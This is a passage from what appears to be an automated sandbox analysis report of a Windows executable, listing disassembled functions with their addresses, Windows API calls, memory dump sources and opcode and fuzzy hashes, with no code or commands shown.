                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                Function 04B6092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$GetProcAddress.$l
                                                • API String ID: 0-2784972518
                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction ID: e4210d52f6757203259fa722a1e7f03093aa408074f88a791a4d7f8a43b615d4
                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction Fuzzy Hash: D0316CB6900609DFEB10DF99C880AAEBBF5FF48324F14418AD942A7350D775FA45CBA4
                                                Function 0099881D Relevance: 3.4, Strings: 2, Instructions: 932COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: KyzL$Uq
                                                • API String ID: 0-1985466972
                                                • Opcode ID: d25a30f8caa6627690eba81820f471efc360c6ebdfdb8018a9626ea7874ceca1
                                                • Instruction ID: 773809398b6908ba04125453fd8e994b939499b9fbdaa1b655f3d5e3b871fe3d
                                                • Opcode Fuzzy Hash: d25a30f8caa6627690eba81820f471efc360c6ebdfdb8018a9626ea7874ceca1
                                                • Instruction Fuzzy Hash: 185219F3A0C6049FE3046E2DEC8567ABBE9EF94760F16463DEAC483744E63598048797
                                                Function 0099F41B Relevance: 3.3, Strings: 2, Instructions: 814COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: P|$P|
                                                • API String ID: 0-3799934927
                                                • Opcode ID: 5f994f84d07909e84ed86f1a7888bb00f46616e21bf21a1e0b601ccdec2b0ea3
                                                • Instruction ID: 832d887f58c0539fc2f42b1962ce23f88f933e007e9b07997cdd3fd578a1565d
                                                • Opcode Fuzzy Hash: 5f994f84d07909e84ed86f1a7888bb00f46616e21bf21a1e0b601ccdec2b0ea3
                                                • Instruction Fuzzy Hash: F03238F360C2049FE3046E2DEC8167AF7DAEB94360F1A4A3DEAC5C3744EA3559118697
                                                Function 004107E2 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,024FEF0D), ref: 004107F7
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 1518329722-0
                                                • Opcode ID: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                                • Instruction ID: 9ffaf8f16d1feaf21b4895ba9d91ffe558ea63f081936d9fadb7ea4d2284f30e
                                                • Opcode Fuzzy Hash: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                                • Instruction Fuzzy Hash: C2F0F4B5A002147F8724EF6EC8049DFBEE9EBC5370725826AE809D3340D9B4DD82C2D4
                                                Function 04D19706 Relevance: 3.0, APIs: 1, Instructions: 1473COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID:
                                                • API String ID: 4168288129-0
                                                • Opcode ID: 33b49f04a218de2c7083f10be8a0aa68633273c3dfcf1cc45880ee3ed5084c1c
                                                • Instruction ID: 1ed8da1ddc72e2c14096d127d2f8598391556a2cb2ec996d4bb7a4d454f66de2
                                                • Opcode Fuzzy Hash: 33b49f04a218de2c7083f10be8a0aa68633273c3dfcf1cc45880ee3ed5084c1c
                                                • Instruction Fuzzy Hash: 32D228B1E092289FDB65CE28ED507EAB7B5FB44304F1441EAD84DE7250E778AA85CF40
                                                Function 0040EEC9 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0Z@$Z@
                                                • API String ID: 0-605451032
                                                • Opcode ID: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                                • Instruction ID: c2704d3dc0eafd102a63da391050ffa25cdd35e93d0e938198e091b07b9d6d51
                                                • Opcode Fuzzy Hash: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                                • Instruction Fuzzy Hash: 7AC1DE709006079ECB34CE69C584A7BBBB1AB45304F184A3FD452BBBD2C339AC59CB59
                                                Function 0040EB87 Relevance: 2.8, Strings: 2, Instructions: 318COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0$H@
                                                • API String ID: 0-2786613154
                                                • Opcode ID: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                                • Instruction ID: 4a3fd9315a5abbba8fc5c956050257a45ee5a7b78c0dcd4935651e2db0378757
                                                • Opcode Fuzzy Hash: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                                • Instruction Fuzzy Hash: 9CB1E57090460B8BDB24CE6AC555ABFB7A1AF05304F140E3FD592B77C1C739A926CB89
                                                Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                Function 004156EE Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004156E9,?,?,00000008,?,?,0041C64A,00000000), ref: 0041591B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                • Instruction ID: 5bcf9fd90164e7ff1602427bca0bed587a5bb36a9d426d5c8fdac6ccf5812400
                                                • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                • Instruction Fuzzy Hash: 72B16C71520A08CFD715CF28C48ABE57BE0FF85364F258659E8A9CF2A1C339D992CB45
                                                Function 04B75955 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B75950,?,?,00000008,?,?,04B7C8B1,00000000), ref: 04B75B82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                • Instruction ID: faba538468a196b22ef3dc2182246589059022568b14ba1b88a09c164b52844d
                                                • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                • Instruction Fuzzy Hash: DDB13E31610608EFD725CF28C486B657BE0FF45365F298698E8E9CF6A1D335E982CB40
                                                Function 004176E7 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                • Instruction ID: d43d4b044ad22829e063f8950bf7820e76fddff19cb0b58812960860f3569e8b
                                                • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                • Instruction Fuzzy Hash: 7F41B4B5D04219AEDB20DF69CC89AEABBB9AF44304F1442DEE41DD3241DA389E85CF14
                                                Function 10007EA9 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                • Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
                                                • Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                • Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10
                                                Function 04B7794E Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                • Instruction ID: 1f3a90fb916b38d4b5ee8fa1c5fa9c68383878a1993b57e4051376bf4cf2a9b5
                                                • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                • Instruction Fuzzy Hash: 5B41B4B5805219AFDF20DF69CC88AEABBB8EF45304F1442D9E41DE3211DA35AE458F60
                                                Function 04D0E2C9 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                                • Instruction ID: b628de6dd17282465361dc5d56a9a12fbdfc830929330daf0a04bcf208f89b46
                                                • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                                • Instruction Fuzzy Hash: 83C1DE70A006068EDB29CF68C588BBABBB1FF45304F18CE59D49A976D1E331F945CB61
                                                Function 04B6F130 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                                • Instruction ID: 59a315c2778ea775d9ed1257265bfcdcd19b0bc1ba3f2ac5b89874293735ddc6
                                                • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                                • Instruction Fuzzy Hash: 00C10E74A006069FDF24CFACE5846BABBB2FF06304F144699E86397694D738B905CF60
                                                Function 04D0DF87 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                                • Instruction ID: 65f3f24c76de2cb4eee7da6f8960c561aa8ffef6e1f1bc5b49752115257ec335
                                                • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                                • Instruction Fuzzy Hash: 35B1B070B0060A9BDB289FA8C994BBEBBA1FF45304F04CE1ED59297AD0D631F501CB91
                                                Function 04B6EDEE Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                                • Instruction ID: f37925cc593c316ae9881622d4452ff5b0efd7030f5e24efaef72cde56ff4deb
                                                • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                                • Instruction Fuzzy Hash: B0B1D478A0460A8BEB24CF68D954ABEB7B1EF04304F140A9EE557D7690D73DFA01CB51
                                                Function 0040A6E0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0000A6EC,0040A064), ref: 0040A6E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                                • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                                • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                                • Instruction Fuzzy Hash:
                                                Function 04B6A947 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(0040A6EC,04B6A2CB), ref: 04B6A94C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                                • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                                • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                                • Instruction Fuzzy Hash:
                                                Function 00AB27DC Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000AAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aac000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ~
                                                • API String ID: 0-1707062198
                                                • Opcode ID: 8356a462a247f14bb6b47b2fd8a02a0373e8d17266fb41802ea114ca0818d2db
                                                • Instruction ID: 54323c23199c65c2a8247955a2f172636534e417a95094ca6017b2ee9bacdfbe
                                                • Opcode Fuzzy Hash: 8356a462a247f14bb6b47b2fd8a02a0373e8d17266fb41802ea114ca0818d2db
                                                • Instruction Fuzzy Hash: E9319EB241C601DFD709AF64E8857BAB7F8EF14310F21481FD2CA86212EA315881EB87
                                                Function 00AAD2A9 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000AAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aac000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: V
                                                • API String ID: 0-1342839628
                                                • Opcode ID: 9f20ce63a5da2650b607b50d5ac113c2262577c70a29e0da87f8709e0cd60a88
                                                • Instruction ID: 631ce8d473864b4aa68d84ec4d94d324ef34c089ef7dcc638872351d1112534f
                                                • Opcode Fuzzy Hash: 9f20ce63a5da2650b607b50d5ac113c2262577c70a29e0da87f8709e0cd60a88
                                                • Instruction Fuzzy Hash: B41148B240C3956EEB024A349915AEA7FB8DB57310F0845ABE8C18B8E7C31A4D198777
                                                Function 00415E19 Relevance: .6, Instructions: 637COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                                • Instruction ID: cacb134cf45b6d3893a07543428c3496bc224f7c3d1c732b13d01dd1be495d2a
                                                • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                                • Instruction Fuzzy Hash: DF323631E29F015DD7239A35D922336A649AFB73C4F56C737E815B5AA9EF28C4C34108
                                                Function 04D15219 Relevance: .6, Instructions: 637COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                                • Instruction ID: 9eba7d26b4c30fb0231ca0f4fdc35c0748861542a6683b4286b29558263be51c
                                                • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                                • Instruction Fuzzy Hash: 6E322322E29F016DD7239A35E932335A689AFB73D4F55C737EC1AB59A5EB28D0834100
                                                Function 04D14AEE Relevance: .3, Instructions: 269COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                • Instruction ID: 44d9c47c0291f05a3910f882056f69193e51d7448e839e206b2a355c1374ebfe
                                                • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                • Instruction Fuzzy Hash: 09B14A31210609AFDB15CF28D48AB657BE1FF45364F298658E8D9CF2B1C335E992CB40
                                                Function 008D9E44 Relevance: .2, Instructions: 174COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf4e92446bc10a1dd9fd696e5a3c0342e64059fa116aefaeff9b94065416ca45
                                                • Instruction ID: ecb2b8e9e8494c3e993047503263cecb5bb454fa9617048ce9510444478fc03d
                                                • Opcode Fuzzy Hash: bf4e92446bc10a1dd9fd696e5a3c0342e64059fa116aefaeff9b94065416ca45
                                                • Instruction Fuzzy Hash: 475149F36082009FF3586D69DC8977EB7D5EB80320F19853EDB858B3C0E97994058396
                                                Function 04D096AC Relevance: .1, Instructions: 147COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                                • Instruction ID: d26ecd3be6f0aac91cfaf9ff7e3e69c37dba3b61adad34e3fb41b18180067497
                                                • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                                • Instruction Fuzzy Hash: 3E514AB2E00615DFDB24CF94D8917AAB7F4FB48314F24806AD405EB2A5D375E941CF98
                                                Function 00AB04DA Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000AAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aac000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 275a8a51f9243a8ba8c29af0d3886a5525e8f2bc5cf591ec73e6d105f5de3950
                                                • Instruction ID: 9d5c45b78fb4d81de9793fbdae8b39921f71fb678fdb5b745da6e8381c7c1118
                                                • Opcode Fuzzy Hash: 275a8a51f9243a8ba8c29af0d3886a5525e8f2bc5cf591ec73e6d105f5de3950
                                                • Instruction Fuzzy Hash: A5419EB290C3109FE305AF29D9816BAF7E9FF94720F16492EE6D583610E7744840CB97
                                                Function 00AB26C7 Relevance: .1, Instructions: 107COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000AAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aac000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b27f2fe3d73a4e431b93ced64bec9c89b0bfd2e97b73a0f6781db5f89bd4a7d
                                                • Instruction ID: 85a9ff1fc2df18a18a8107c382e8912a31c5b2b8ff033237e2dad6f3a9148806
                                                • Opcode Fuzzy Hash: 8b27f2fe3d73a4e431b93ced64bec9c89b0bfd2e97b73a0f6781db5f89bd4a7d
                                                • Instruction Fuzzy Hash: 1B318DB241C701DFD7056F64E8857BAB7F8EF14710F26492FD2CA86212EA354981EB87
                                                Function 00AB27F3 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000AAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aac000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 19fc89fa3978702cac6b86364503d5f61f30650d409f676c3f5f496d8116bedc
                                                • Instruction ID: 0e8a052835362dd0ae84beee051173516b61896f6d4e7bb5c747892c69b81a7c
                                                • Opcode Fuzzy Hash: 19fc89fa3978702cac6b86364503d5f61f30650d409f676c3f5f496d8116bedc
                                                • Instruction Fuzzy Hash: 12318FB241C705DFD7096F64E8856BAB7F8EF14710F21492FD2CA86251EA314981EB47
                                                Function 00AB2825 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000AAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aac000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69efb528d1d79b172263658b84c3116a23841f728ea39299615876d7ff0af720
                                                • Instruction ID: 88496012c4a040495f15fdc6fea0ba05e717d92a8099c6ba0417a0500d13ad7c
                                                • Opcode Fuzzy Hash: 69efb528d1d79b172263658b84c3116a23841f728ea39299615876d7ff0af720
